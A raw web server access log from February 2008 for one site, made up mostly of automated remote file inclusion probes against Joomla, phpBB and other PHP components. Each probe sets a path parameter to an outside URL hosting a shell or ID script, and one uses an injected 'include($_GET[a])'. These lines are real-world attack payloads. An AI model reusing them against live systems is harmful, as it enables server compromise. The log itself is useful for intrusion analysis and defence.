209.59.155.2 - - [17/Feb/2008:04:42:35 -0800] "GET /logs/access_080120.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.partyanimals.nl/uploads/dkyes.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:04:42:44 -0800] "GET /logs/access_080126.log/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:04:42:44 -0800] "GET /logs/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:04:44:11 -0800] "GET /logs/access_080126.log/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:04:44:12 -0800] "GET /logs/index.php?option=com_mgm&Itemid=&mosConfig_absolute_path=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
65.111.169.172 - - [17/Feb/2008:04:44:17 -0800] "GET /logs/access_080120.log///wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:04:44:27 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://mensagenss.hospedagemdesite.com/bot/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
83.246.94.115 - - [17/Feb/2008:04:44:27 -0800] "GET /modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=http://www.nagualhosting.com/cache/about.gif?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:04:44:57 -0800] "GET /logs/access_080103.log/!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:04:44:57 -0800] "GET /logs/!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:04:48:29 -0800] "GET /logs/access_071230.log//index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:04:48:29 -0800] "GET /logs//index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:04:49:32 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:04:49:38 -0800] "GET /logs//joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:04:49:38 -0800] "GET //joomla/index.php?option=com_restaurante&task=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:04:51:02 -0800] "GET /logs//index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
83.149.90.29 - - [17/Feb/2008:04:51:02 -0800] "GET //index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebtown.com/shadowww/test.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.dmulk.com"
61.63.3.45 - - [17/Feb/2008:04:51:18 -0800] "GET /logs/components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.61 (Macintosh; I; PPC)" "www.dmulk.com"
61.63.3.45 - - [17/Feb/2008:04:51:23 -0800] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.dmulk.com"
68.161.236.45 - - [17/Feb/2008:04:52:43 -0800] "GET /logs/access_071225.log//skin/zero_vote/error.php?dir=http://novipazar.info/on.txt?? HTTP/1.0" 404 275 "-" "libwww-perl/5.53" "www.dmulk.com"
61.63.3.45 - - [17/Feb/2008:04:52:57 -0800] "GET /administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows CE 4.21; rv:1.8b4) Gecko/20050720 Minimo/0.007" "www.dmulk.com"
61.63.3.45 - - [17/Feb/2008:04:52:58 -0800] "GET /logs/administrator/components/com_chronocontact/excelwriter/Writer/Format.php?mosConfig_absolute_path=http://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.1; Windows NT 5.1;)" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:04:53:06 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.dmulk.com"
82.146.33.210 - - [17/Feb/2008:04:53:07 -0800] "GET /logs/administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/safe.txt? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)" "www.dmulk.com"
70.86.236.106 - - [17/Feb/2008:04:53:26 -0800] "GET /logs/access.log/!scanhttp://birka.no/pics/Artikler/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
64.191.28.10 - - [17/Feb/2008:04:53:58 -0800] "GET /logs//admin/email.php?vwar_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)" "www.dmulk.com"
64.191.28.10 - - [17/Feb/2008:04:54:03 -0800] "GET //admin/email.php?vwar_root=http://paginas.terra.com.br/lazer/fatalzin/NewCmd.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
212.227.95.210 - - [17/Feb/2008:04:54:20 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.95.210 - - [17/Feb/2008:04:54:20 -0800] "GET /modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.95.210 - - [17/Feb/2008:04:54:21 -0800] "GET /logs/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
212.227.95.210 - - [17/Feb/2008:04:54:21 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.64" "www.dmulk.com"
65.98.68.186 - - [17/Feb/2008:04:54:25 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [17/Feb/2008:04:54:25 -0800] "GET /modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [17/Feb/2008:04:54:26 -0800] "GET /logs/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
65.98.68.186 - - [17/Feb/2008:04:54:26 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:04:54:33 -0800] "GET /logs/access_071222.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [17/Feb/2008:04:55:02 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [17/Feb/2008:04:55:03 -0800] "GET /modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [17/Feb/2008:04:55:03 -0800] "GET /logs/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
161.58.27.58 - - [17/Feb/2008:04:55:03 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.65.169.46 - - [17/Feb/2008:04:55:07 -0800] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.partyanimals.nl/uploads/kola.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:55:08 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:55:08 -0800] "GET /modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:55:08 -0800] "GET /logs/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.18.233.34 - - [17/Feb/2008:04:55:08 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.beautiful-atlanta.com/admin/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
81.17.35.69 - - [17/Feb/2008:04:55:32 -0800] "GET //index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://underhack.890m.com/a.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
64.38.50.26 - - [17/Feb/2008:04:58:12 -0800] "GET /logs/access_080120.log/index.php?sourcedir=http://spyd0x.olympe-network.com/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:04:58:46 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.55.164.183 - - [17/Feb/2008:04:59:11 -0800] "GET /logs/access_071225.log//index.php?option=com_search&Itemid=&mosConfig_absolute_path=http://www.greytauctions.org/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:04:59:43 -0800] "GET /logs/access_080106.log/modifyform.html?code=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:04:59:43 -0800] "GET /modifyform.html?code=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:04:59:43 -0800] "GET /modifyform.html?code=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:04:59:43 -0800] "GET /logs/modifyform.html?code=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.149.242.150 - - [17/Feb/2008:04:59:44 -0800] "GET /logs/access_071224.log/modifyform.html?code=http://www.theauctiondepo.com/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.10.219.245 - - [17/Feb/2008:05:00:13 -0800] "GET /logs/access_080121.log/components/com_forum/download.php?phpbb_root_path=http://www.mta.cl/galeria2/galery.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.800" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:01:12 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:01:42 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:01:43 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:01:43 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:05:01:51 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:05:01:51 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:05:02:23 -0800] "GET /logs/access_080201.log//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.135.207.90 - - [17/Feb/2008:05:02:23 -0800] "GET /logs//administrator/components/com_chronocontact/excelwriter/Writer/Worksheet.php?mosConfig_absolute_path=http://zzpx.com/files/doceboLms/.shared/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:05:02:49 -0800] "GET /logs/access_080121.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
68.157.122.154 - - [17/Feb/2008:05:03:11 -0800] "GET /logs/access_080117.log/modify.php?dir_module=http://dointhestuff.org/new/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.28.151 - - [17/Feb/2008:05:03:32 -0800] "GET /logs/?D=A HTTP/1.0" 200 35679 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:03:41 -0800] "GET //oneadmin/photogallery/include.php?path[docroot]=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.com/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
62.112.140.125 - - [17/Feb/2008:05:03:42 -0800] "GET /errors.php?error=http://www.dg-mitteldeutschland.de/sys_cr4nk/i? HTTP/1.1" 404 275 "-" "cr4nk.ath.cx/4.7 [en] (Windows 3.1; I) [Netscape]" "www.dmulk.com"
218.185.20.38 - - [17/Feb/2008:05:04:30 -0800] "GET /bughttp://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
218.185.20.38 - - [17/Feb/2008:05:04:30 -0800] "GET /logs/bughttp://www.free-ddl.com/siteadmin/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 5.23; Mac_PowerPC)" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:05:26 -0800] "GET /logs/access_080122.log/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:05:26 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:05:26 -0800] "GET /logs/index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:05:06:44 -0800] "GET /logs/access_071220.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:05:06:44 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:05:06:45 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:05:06:46 -0800] "GET /logs/access_080103.log/akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:05:06:46 -0800] "GET /akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:05:06:47 -0800] "GET /logs/akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.134.6.30 - - [17/Feb/2008:05:06:52 -0800] "GET /logs/access_071216.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
72.30.216.103 - - [17/Feb/2008:05:07:10 -0800] "GET /logs/access_071225.log HTTP/1.0" 200 195051 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:05:07:59 -0800] "GET /logs/access_071216.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:05:07:59 -0800] "GET //viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:05:07:59 -0800] "GET /logs//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
67.15.190.12 - - [17/Feb/2008:05:08:02 -0800] "GET /logs/access_071228.log//viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%2527.include($_GET[a]),exit.%2527&a=http://xucx.co.cc/gen/mix.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:05:08:07 -0800] "GET /logs/access_070825.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tkp.edu.hk/chinwork/file/2002340.htm/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:05:08:08 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tkp.edu.hk/chinwork/file/2002340.htm/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:05:08:09 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tkp.edu.hk/chinwork/file/2002340.htm/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.112.124.79 - - [17/Feb/2008:05:08:13 -0800] "GET /logs/access_080122.log//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/MIC22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.112.124.79 - - [17/Feb/2008:05:08:13 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/MIC22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
82.112.124.79 - - [17/Feb/2008:05:08:14 -0800] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://www.saenterpriseworkshop.com/vnc/MIC22.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.22.158 - - [17/Feb/2008:05:08:16 -0800] "GET /?M=D HTTP/1.0" 200 2946 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.86.232.194 - - [17/Feb/2008:05:09:05 -0800] "GET /logs/access.log/akocomments.php?mosConfig_absolute_path=http://www.7s-softball.com/modules/tinycontent/content/load.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:05:09:35 -0800] "GET /logs/access_070825.log//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tkp.edu.hk/chinwork/file/2002340.htm/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:05:09:38 -0800] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tkp.edu.hk/chinwork/file/2002340.htm/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
218.83.155.78 - - [17/Feb/2008:05:09:39 -0800] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.tkp.edu.hk/chinwork/file/2002340.htm/php.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:09:42 -0800] "GET /logs/access_071228.log/?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:09:42 -0800] "GET /?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 2962 "-" "libwww-perl/5.805" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:09:42 -0800] "GET /logs/?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 200 34972 "-" "libwww-perl/5.805" "www.dmulk.com"
88.191.49.81 - - [17/Feb/2008:05:09:50 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
208.77.102.172 - - [17/Feb/2008:05:09:55 -0800] "GET /logs/access_071231.log/?GALLERY_BASEDIR=http://stmikx.freehoxt.com/Sekip/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:10:37 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
85.115.163.50 - - [17/Feb/2008:05:10:44 -0800] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://opsz.3x.ro/safeon.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:05:10:52 -0800] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:05:11:11 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
89.184.165.34 - - [17/Feb/2008:05:11:33 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
69.64.76.29 - - [17/Feb/2008:05:12:37 -0800] "GET /administrator/components/com_wmtgallery/admin.wmtgallery.php?mosConfig_live_site=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:05:12:54 -0800] "GET /logs/access_080131.log/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
87.230.11.181 - - [17/Feb/2008:05:12:55 -0800] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://www.j-vision.co.kr/company/rhe/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
